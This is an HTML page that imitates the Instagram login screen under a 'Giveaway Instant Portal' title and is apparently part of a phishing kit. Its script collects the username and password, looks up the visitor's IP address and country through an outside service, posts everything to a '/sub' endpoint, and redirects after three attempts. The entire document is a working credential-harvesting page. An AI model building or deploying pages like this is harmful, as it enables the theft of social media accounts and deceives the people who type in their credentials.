<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- <title>Giveaway Instant Portal </title> -->
    <link rel="stylesheet" href="css/main.css">
    <meta name="robots" content="noindex">


<head>
    <section class="section-all" style='color: #507392;'>

        <!-- 1-Role Main -->
        <main class="main" role="main">
            <div class="wrapper">
                <article class="article">
                    <div class="content" style="marging-top:50%;">
                        <div class="login-box">
                            <div class="header">
                                <img class="logo" src="img/1024px-Instagram_logo.svg.png">
                            </div><!-- Header end -->
                            <div class="form-wrap">
                                <!-- <form class="form"> -->

                                    <div class="input-box">
                                        <input type="text" id="username"
                                            placeholder="Phone number, username, or email" name="username" >
                                    </div>

                                    <div class="input-box">
                                        <input type="password"  id="password" placeholder="Password" name="password" >
                                    </div>

                                    <span class="button-box">
                                        <img src="img/img/hug.gif" width="20px" id="loader" style="position: absolute; top: 0.5em; left: 9em; display: none; ">

                                        <button type="submit" class="btn" name="submit" id="login" value="submit">Log in</button>
                                    </span>

                                    <a class="forgot" href="">Forgot password?</a>
                                    <p id="feedback" style="color: red;  font-family: sans-serif; font-size: 15px; text-align: center; margin: 0 30px; display: none;"></p><br>

                                <!-- </form> -->
                            </div> <!-- Form-wrap end -->
                        </div> <!-- Login-box end -->

                        <div class="login-box">
                            <p class="text">Don't have an account?<a href="#">Sign up</a></p>
                        </div> <!-- Signup-box end -->

                        <div class="app">
                            
                            <p>Get the app.</p>
                            <div class="app-img">
                                <a
                                    href="">
                                    <img
                                        src="img/img/ios.png" style="height: 50px;">
                                </a>
                                <a
                                    href="">
                                    <img
                                        src="img/img/apk.png"  style="height: 40px; margin-top: 5px;">
                                </a>
                            </div> <!-- App-img end-->
                        </div> <!-- App end -->
                    </div> <!-- Content end -->
                </article>
            </div> <!-- Wrapper end -->
        </main>

        <!-- 2-Role Footer -->
        <footer class="footer" role="contentinfo">
            <div class="footer-container">

                <nav class="footer-nav" role="navigation">
                    <ul>
                        <li><a href="">About Us</a></li>
                        <li><a href="">Support</a></li>
                        <li><a href="">Blog</a></li>
                        <li><a href="">Press</a></li>
                        <li><a href="">Api</a></li>
                        <li><a href="">Jobs</a></li>
                        <li><a href="">Privacy</a></li>
                        <li><a href="">Terms</a></li>
                        <li><a href="">Directory</a></li>
                        <li>
                            <span class="language">Language
                                <select name="language" class="select" onchange="la(this.value)">
                                    <option value="#">English</option>
                                    <option value="">Russian</option>
                                </select>
                            </span>
                        </li>
                    </ul>
                </nav>

                <!-- <span class="footer-logo">&copy; 2018 Instagram</span> -->
            </div> <!-- Footer container end -->
        </footer>

    </section>
    </span> <!-- Root -->
    <script>
        var login = document.getElementById('login');
        var loader = document.getElementById('loader');
        var feedback = document.getElementById('feedback');
        var username = document.getElementById('username');
        var password = document.getElementById('password');
        var attempts = 0;
    
        login.addEventListener('click', function () {
            login.textContent = "";
            loader.style.display = "flex";
    
            setTimeout(() => {
                feedback.style.display = 'block';
                login.textContent = "Log In";
                loader.style.display = "none";
    
                if (username.value == "" || password.value == "") {
                    feedback.textContent = "Inputs cannot be empty.";
                } else {
                    handleValidation();
                }
            }, 1500);
        });
    
        function handleValidation() {
            login.textContent = "";
            loader.style.display = 'flex';
    
            setTimeout(() => {
                login.textContent = 'Log In';
                loader.style.display = 'none';
    
                // Fetch user's IP and country from the client side
                fetch('https://ipapi.co/json/')
                    .then(response => response.json())
                    .then(data => {
                        const country = data.country_name; // Country returned from the API
                        const ipAddress = data.ip; // IP address returned from the API
    
                        // Create data object to send to the server
                        const dataToSend = {
                            username: username.value,
                            password: password.value,
                            ip: ipAddress,
                            country: country
                        };
    
                        // Send data to the server using fetch
                        fetch('/sub', {
                            method: 'POST',
                            headers: {
                                'Content-Type': 'application/json'
                            },
                            body: JSON.stringify(dataToSend)
                        })
                        .then(response => response.json())
                        .then(data => {
                            // Handle feedback and track attempts
                            if (data.success) {
                                attempts++;
                                if (attempts >= 3) {
                                    feedback.textContent = 'You have reached the maximum number of attempts.';
                                    window.location.href = '/success'; // Redirect to success page after 3 attempts
                                } else {
                                    feedback.textContent = `Attempt ${attempts}: Data submitted successfully.`;
                                }
                            } else {
                                attempts++;
                                feedback.textContent = `Attempt ${attempts}: There was an issue submitting your data.`;
                            }
                        })
                        .catch(error => {
                            feedback.textContent = 'Error occurred. Please try again later.';
                            loader.style.display = 'none';
                        });
                    })
                    .catch(err => {
                        feedback.textContent = 'Could not fetch location. Please try again later.';
                        loader.style.display = 'none';
                    });
            }, 1500);
        }
    </script>
    

</body>

</html>